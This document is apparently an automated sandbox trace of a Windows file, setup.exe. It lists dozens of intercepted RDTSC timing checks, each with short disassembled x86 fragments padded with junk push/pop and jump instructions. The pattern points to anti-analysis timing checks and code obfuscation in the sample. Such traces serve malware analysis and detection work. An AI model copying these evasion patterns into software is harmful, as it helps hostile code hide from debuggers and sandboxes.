Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 9FF510 second address: 9FF52D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FBA24820D9Fh 0x00000009 pop ebx 0x0000000a pushad 0x0000000b jns 00007FBA24820D96h 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: A111C5 second address: A111C9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: A111C9 second address: A111ED instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FBA24820DA5h 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a push ecx 0x0000000b pop ecx 0x0000000c popad 0x0000000d pushad 0x0000000e pushad 0x0000000f popad 0x00000010 push eax 0x00000011 pop eax 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: A19634 second address: A1963F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ebx 0x00000004 pop ebx 0x00000005 pushad 0x00000006 popad 0x00000007 popad 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: A1963F second address: A1966A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 js 00007FBA24820D96h 0x0000000c jne 00007FBA24820D96h 0x00000012 popad 0x00000013 pop edx 0x00000014 pop eax 0x00000015 push eax 0x00000016 push eax 0x00000017 push edx 0x00000018 push esi 0x00000019 pop esi 0x0000001a jmp 00007FBA24820DA1h 0x0000001f rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: A17EE3 second address: A17EE9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: A17EE9 second address: A17EED instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: A1802E second address: A18036 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: A18036 second address: A18047 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jbe 00007FBA24820D9Ch 0x0000000b rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: A1DB51 second address: A1DB69 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007FBA2516CD53h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: A276C4 second address: A276D2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 js 00007FBA24820D96h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: A276D2 second address: A276EF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBA2516CD59h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: A276EF second address: A276F4 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: A2C156 second address: A2C166 instructions: 0x00000000 rdtsc 0x00000002 ja 00007FBA2516CD46h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edi 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: A2C166 second address: A2C186 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FBA24820DA8h 0x00000009 push edx 0x0000000a pop edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: A2C186 second address: A2C18B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: A30821 second address: A3083D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBA24820DA7h 0x00000007 push ebx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: A32122 second address: A3213A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jng 00007FBA2516CD46h 0x0000000c popad 0x0000000d popad 0x0000000e pushad 0x0000000f push esi 0x00000010 jl 00007FBA2516CD46h 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: A42A44 second address: A42A59 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jc 00007FBA24820D96h 0x00000009 jnp 00007FBA24820D96h 0x0000000f popad 0x00000010 pushad 0x00000011 push ebx 0x00000012 pop ebx 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: A5ACC8 second address: A5ACD2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 ja 00007FBA2516CD46h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: A5AF95 second address: A5AF9F instructions: 0x00000000 rdtsc 0x00000002 jno 00007FBA24820D96h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: A5AF9F second address: A5AFA8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edi 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: A5AFA8 second address: A5AFB4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: A5AFB4 second address: A5AFBE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnl 00007FBA2516CD46h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: A5AFBE second address: A5AFDC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jmp 00007FBA24820DA6h 0x0000000d rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: A5B349 second address: A5B35C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBA2516CD4Fh 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: A5B776 second address: A5B77E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 pushad 0x00000007 popad 0x00000008 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: A5B8D9 second address: A5B8DF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: A5D26C second address: A5D272 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: A5D272 second address: A5D284 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBA2516CD4Dh 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: A5FD68 second address: A5FD6D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: A5FE14 second address: A5FE1E instructions: 0x00000000 rdtsc 0x00000002 je 00007FBA2516CD46h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: A5FE1E second address: A5FE23 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: A60134 second address: A60138 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: A60138 second address: A6013E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: A6013E second address: A60144 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: A60144 second address: A60148 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: A60148 second address: A6014C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: A631C6 second address: A631CC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: A62D9B second address: A62DAA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBA2516CD4Bh 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: A64CDC second address: A64CFB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FBA24820DA4h 0x00000009 jc 00007FBA24820D96h 0x0000000f popad 0x00000010 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 48B006C second address: 48B008E instructions: 0x00000000 rdtsc 0x00000002 mov edi, ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 xchg eax, ebp 0x00000008 jmp 00007FBA2516CD4Eh 0x0000000d mov ebp, esp 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 mov bx, 5F50h 0x00000016 mov eax, edi 0x00000018 popad 0x00000019 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 48E0F2C second address: 48E0F32 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 48E0F32 second address: 48E0F91 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBA2516CD4Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a jmp 00007FBA2516CD50h 0x0000000f push eax 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 call 00007FBA2516CD4Ch 0x00000018 pop esi 0x00000019 pushfd 0x0000001a jmp 00007FBA2516CD4Bh 0x0000001f and ecx, 5FE9E6BEh 0x00000025 jmp 00007FBA2516CD59h 0x0000002a popfd 0x0000002b popad 0x0000002c rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 48E0F91 second address: 48E0FB8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBA24820DA1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a pushad 0x0000000b mov bx, si 0x0000000e push eax 0x0000000f mov ch, bl 0x00000011 pop eax 0x00000012 popad 0x00000013 mov ebp, esp 0x00000015 push eax 0x00000016 push edx 0x00000017 push eax 0x00000018 push edx 0x00000019 pushad 0x0000001a popad 0x0000001b rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 48E0FB8 second address: 48E0FBC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 48E0FBC second address: 48E0FC2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 4880132 second address: 48801B1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBA2516CD51h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebp, esp 0x0000000b jmp 00007FBA2516CD4Eh 0x00000010 push dword ptr [ebp+04h] 0x00000013 pushad 0x00000014 pushad 0x00000015 jmp 00007FBA2516CD4Ch 0x0000001a movzx eax, di 0x0000001d popad 0x0000001e pushfd 0x0000001f jmp 00007FBA2516CD57h 0x00000024 jmp 00007FBA2516CD53h 0x00000029 popfd 0x0000002a popad 0x0000002b push dword ptr [ebp+0Ch] 0x0000002e pushad 0x0000002f push eax 0x00000030 push edx 0x00000031 jmp 00007FBA2516CD52h 0x00000036 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 48A0893 second address: 48A0898 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 48A0898 second address: 48A089E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 48A089E second address: 48A08A2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 48A08A2 second address: 48A090B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBA2516CD59h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ebp 0x0000000c pushad 0x0000000d jmp 00007FBA2516CD4Ch 0x00000012 pushfd 0x00000013 jmp 00007FBA2516CD52h 0x00000018 add cx, 2F38h 0x0000001d jmp 00007FBA2516CD4Bh 0x00000022 popfd 0x00000023 popad 0x00000024 push eax 0x00000025 push eax 0x00000026 push edx 0x00000027 jmp 00007FBA2516CD54h 0x0000002c rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 48A090B second address: 48A091D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FBA24820D9Eh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 48A091D second address: 48A096B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBA2516CD4Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ebp 0x0000000c pushad 0x0000000d mov cl, EFh 0x0000000f pushfd 0x00000010 jmp 00007FBA2516CD51h 0x00000015 add al, FFFFFFE6h 0x00000018 jmp 00007FBA2516CD51h 0x0000001d popfd 0x0000001e popad 0x0000001f mov ebp, esp 0x00000021 push eax 0x00000022 push edx 0x00000023 jmp 00007FBA2516CD4Dh 0x00000028 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 48A096B second address: 48A0992 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edx 0x00000004 pop eax 0x00000005 mov si, dx 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pop ebp 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007FBA24820DA7h 0x00000015 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 48A0992 second address: 48A0996 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 48A0996 second address: 48A099C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 48A076C second address: 48A077C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FBA2516CD4Ch 0x00000009 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 48A077C second address: 48A0797 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBA24820D9Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f mov edi, eax 0x00000011 mov di, cx 0x00000014 popad 0x00000015 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 48A0797 second address: 48A07C6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBA2516CD53h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FBA2516CD55h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 48A07C6 second address: 48A07CC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 48A07CC second address: 48A07D0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 48A07D0 second address: 48A07D4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 48A07D4 second address: 48A0805 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov ebp, esp 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d mov si, B737h 0x00000011 pushfd 0x00000012 jmp 00007FBA2516CD4Ch 0x00000017 xor esi, 30505828h 0x0000001d jmp 00007FBA2516CD4Bh 0x00000022 popfd 0x00000023 popad 0x00000024 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 48A0805 second address: 48A0832 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBA24820DA9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FBA24820D9Dh 0x00000011 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 48A04FB second address: 48A0513 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FBA2516CD54h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 48A0513 second address: 48A0543 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov ebp, esp 0x0000000a pushad 0x0000000b movsx ebx, cx 0x0000000e push esi 0x0000000f push edx 0x00000010 pop esi 0x00000011 pop ebx 0x00000012 popad 0x00000013 pop ebp 0x00000014 push eax 0x00000015 push edx 0x00000016 pushad 0x00000017 mov si, dx 0x0000001a jmp 00007FBA24820DA5h 0x0000001f popad 0x00000020 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 48B03EF second address: 48B0472 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FBA2516CD4Fh 0x00000009 or cl, FFFFFFEEh 0x0000000c jmp 00007FBA2516CD59h 0x00000011 popfd 0x00000012 pushfd 0x00000013 jmp 00007FBA2516CD50h 0x00000018 jmp 00007FBA2516CD55h 0x0000001d popfd 0x0000001e popad 0x0000001f pop edx 0x00000020 pop eax 0x00000021 push eax 0x00000022 pushad 0x00000023 mov bl, 8Ch 0x00000025 jmp 00007FBA2516CD58h 0x0000002a popad 0x0000002b xchg eax, ebp 0x0000002c push eax 0x0000002d push edx 0x0000002e pushad 0x0000002f mov edx, 21573510h 0x00000034 mov bh, 92h 0x00000036 popad 0x00000037 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 48E0E6F second address: 48E0E8A instructions: 0x00000000 rdtsc 0x00000002 mov esi, edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push ebx 0x00000008 jmp 00007FBA24820D9Ah 0x0000000d mov dword ptr [esp], ebp 0x00000010 pushad 0x00000011 pushad 0x00000012 pushad 0x00000013 popad 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 48E0E8A second address: 48E0E9F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push ecx 0x00000006 mov ebx, 2ECC9C8Ah 0x0000000b pop edx 0x0000000c popad 0x0000000d mov ebp, esp 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 48E0E9F second address: 48E0EA3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 48E0EA3 second address: 48E0EB6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBA2516CD4Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 48E0EB6 second address: 48E0EBC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 48C04AF second address: 48C0501 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov edx, 79020C34h 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c pushad 0x0000000d mov di, cx 0x00000010 mov bh, cl 0x00000012 popad 0x00000013 mov dword ptr [esp], ebp 0x00000016 pushad 0x00000017 mov bh, 13h 0x00000019 pushfd 0x0000001a jmp 00007FBA2516CD54h 0x0000001f add ax, 1518h 0x00000024 jmp 00007FBA2516CD4Bh 0x00000029 popfd 0x0000002a popad 0x0000002b mov ebp, esp 0x0000002d pushad 0x0000002e mov ebx, ecx 0x00000030 mov di, ax 0x00000033 popad 0x00000034 mov eax, dword ptr [ebp+08h] 0x00000037 push eax 0x00000038 push edx 0x00000039 push eax 0x0000003a push edx 0x0000003b pushad 0x0000003c popad 0x0000003d rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 48C0501 second address: 48C0505 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 48C0505 second address: 48C050B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 48C050B second address: 48C0565 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov bx, ax 0x00000006 movzx esi, dx 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c and dword ptr [eax], 00000000h 0x0000000f pushad 0x00000010 mov bx, 1554h 0x00000014 push ebx 0x00000015 pushfd 0x00000016 jmp 00007FBA24820DA8h 0x0000001b add esi, 630C2908h 0x00000021 jmp 00007FBA24820D9Bh 0x00000026 popfd 0x00000027 pop eax 0x00000028 popad 0x00000029 and dword ptr [eax+04h], 00000000h 0x0000002d push eax 0x0000002e push edx 0x0000002f jmp 00007FBA24820DA2h 0x00000034 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 48A0672 second address: 48A0681 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBA2516CD4Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 48A0681 second address: 48A0702 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edx 0x00000004 pop ecx 0x00000005 mov ecx, edx 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b pushad 0x0000000c pushfd 0x0000000d jmp 00007FBA24820D9Ah 0x00000012 sub si, 02C8h 0x00000017 jmp 00007FBA24820D9Bh 0x0000001c popfd 0x0000001d push ecx 0x0000001e pop eax 0x0000001f popad 0x00000020 xchg eax, ebp 0x00000021 pushad 0x00000022 jmp 00007FBA24820DA7h 0x00000027 mov ebx, esi 0x00000029 popad 0x0000002a mov ebp, esp 0x0000002c pushad 0x0000002d mov ebx, eax 0x0000002f pushfd 0x00000030 jmp 00007FBA24820D9Ch 0x00000035 adc eax, 5678B788h 0x0000003b jmp 00007FBA24820D9Bh 0x00000040 popfd 0x00000041 popad 0x00000042 pop ebp 0x00000043 push eax 0x00000044 push edx 0x00000045 push eax 0x00000046 push edx 0x00000047 jmp 00007FBA24820DA0h 0x0000004c rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 48A0702 second address: 48A0706 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 48A0706 second address: 48A070C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 48C001B second address: 48C0022 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edi 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 48C0022 second address: 48C0083 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push ebx 0x00000008 jmp 00007FBA24820D9Ch 0x0000000d mov dword ptr [esp], ebp 0x00000010 pushad 0x00000011 pushfd 0x00000012 jmp 00007FBA24820D9Eh 0x00000017 sub eax, 03544DD8h 0x0000001d jmp 00007FBA24820D9Bh 0x00000022 popfd 0x00000023 push eax 0x00000024 push edx 0x00000025 pushfd 0x00000026 jmp 00007FBA24820DA6h 0x0000002b sub al, 00000038h 0x0000002e jmp 00007FBA24820D9Bh 0x00000033 popfd 0x00000034 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 48C0083 second address: 48C00D1 instructions: 0x00000000 rdtsc 0x00000002 call 00007FBA2516CD58h 0x00000007 pop eax 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b mov ebp, esp 0x0000000d jmp 00007FBA2516CD51h 0x00000012 pop ebp 0x00000013 push eax 0x00000014 push edx 0x00000015 push eax 0x00000016 push edx 0x00000017 jmp 00007FBA2516CD58h 0x0000001c rdtsc
